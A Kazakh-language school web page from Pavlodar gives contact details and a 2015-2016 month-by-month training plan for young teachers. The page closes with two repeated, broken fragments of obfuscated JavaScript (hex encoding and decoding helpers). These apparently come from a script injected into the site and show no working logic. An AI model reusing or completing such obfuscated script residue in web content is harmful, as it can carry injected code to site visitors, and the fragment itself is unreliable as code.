Сенім телефоны
601920
email: sosh26@goo.edu.kz
Мекенжайы: Павлодар қаласы, Семенченко көшесі, 70
601920, 602114, 601968
Білім бөлімінің басты бетіне қайту
Азаматтарды жеке қабылдау кестесі:
дүйсенбі 15.00 - 18.00, жұма 11.30 - 13.30
За год
За месяц
За неделю
Вчера
Жас мамандарды оқыту жоспары
 2015-2016 оқу жылында жас мамандарды оқыту жоспары

Жас мамандарды оқыту мақсаты:

  • Тәжірибе жүзінде табысты қолдану үшін кәсіби іскерлік пен дағдыларын қалыптастыру.
Міндеттер:
  • Оқыту мазмұнын, жас мұғалімдерді оқытуда сағат санын анықтау;
  • Оқыту әдістемесімен таныстыру;
  • Сауалнаманы қолдана отырып, жас мұғалімнің табысты жұмысына диагностика өткізу.
Жоспарлауда мына салалар қамтылған:
  • Нормативтік құжаттармен таныстыру.
  • Сабақ және сабақтан тыс жұмыстар.
  • Сабақты талдау және өздігінен талдау.
  • Оқыту нәтижелеріне диагностика жүргізу.
  • Білімдерін бақылау және бағалау.
  • Педагогикалық технологиялар.
  • Оқушылардың сабақтағы жұмыстарын ұйымдастыру түрлері.
  • Тәрбиелік жұмыс.

Жас мамандарды оқыту жоспары

Оқыту мазмұны Күтілетін нәтижелер Оқыту әдістері Сағат саны
Оқу жоспарымен, бағдарламамен, тақырыптық-күнтізбелік жоспарымен таныстыру. Практикалық талаптар мен бағдарлама мазмұнын білу; оқу материалын іріктеп алуын білу; құжаттамаларды сауатты жүргізу, оқушылардың жеке істерін, сынып журналдарын рәсімдеу. Кеңес беру, нұсқаулықпен таныс болу. Қыркүйек
Сабақ жоспарлаудың әдістемесін меңгерту. Мақсат, міндеттерді қоя білу, кезеңдерді жоспарлау, уақытын дұрыс пайдалану, оқу материалын іріктеу, бар ақпаратты оқулықтағы мазмұнымен қатынастыра білу. Кеңес беру, тәлімгер мұғалімдердің сабақтарына қатысу және талдау жүргізу; практикум. Қараша
Сабақты өздігінен талдау. Сабақты өздігінен талдай білу, сабақтың жақсы және нашар жақтарын көре білу, сабақтың нашар жақтарын түзетіп, жақсарту. Өз білімін жетілдіру, әдістемелік әдебиеттерді оқу, тәлімгер мұғалімдер үшін сабақ өткізу. Қаңтар
Оқушылардың сабақтағы жұмыстарын ұйымдастыру түрлері. Оқушылардың сабақтағы жұмысын дұрыс ұйымдастыра білу, ұйымдастырудың тиімді тәсілдерін қолдану, оқушы назарын қолдай білу. Әдістемелік әдебиеттерді оқу, тәлімгер мұғалімдер үшін сабақ өткізу, рефлексті-жиынтық- оқыту. Ақпан
Пән бойынша сыныптан тыс жұмыс. Оқушылардың танымдық қызығушылықтарын қалыптастыра білу, мектептік ОҒБ жұмысына тарту, олимпиадаларға, байқауларға қатыстыру. ӘБ мұғалімдері үшін ашық іс-шара, мектептік ОҒБ конференциясында тақырып бойынша сөз сөйлеу. Ақпан
Сынып жетекшілігінің жұмысын жоспарлау. Ата-аналармен байланыс орната білу, оларды сынып жұмысына тарту, оқушылармен іскерлік қарым-қатынас орнату. Әдістемелік әдебиеттерді оқу, психологтың кеңесі, тәжірибесі мол мұғалімдердің балалармен қарым-қатынастық тәжірибесімен таныстыру. Наурыз
Оқушылар білімін бағалауына бақылау жүргізу. Бағалау нормаларына сәйкес оқушыларды дұрыс бағалай білу. Кеңес беру, әдістемелік әдебиеттерді оқу, практикалық жұмыс. Наурыз
Жас мұғалімнің жұмысында тудыратын қиыншылықты анықтау. Өз тәжірибесін, қиыншылықтарын, табыстарын талдай білу. Сауалнама жүргізу, әңгімелесу. Сәуір
Оқыту нәтижелеріне диагностика жүргізу. Өз жұмысына және алынған нәтижелерге талдау жүргізу, жақсарту бойынша әр қадамын салыстыру, жоспарлау. Практикалық жұмыс, өз теориялық және практикалық дайындық деңгейін арттыру бойынша өзіндік жұмыс. Мамыр
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e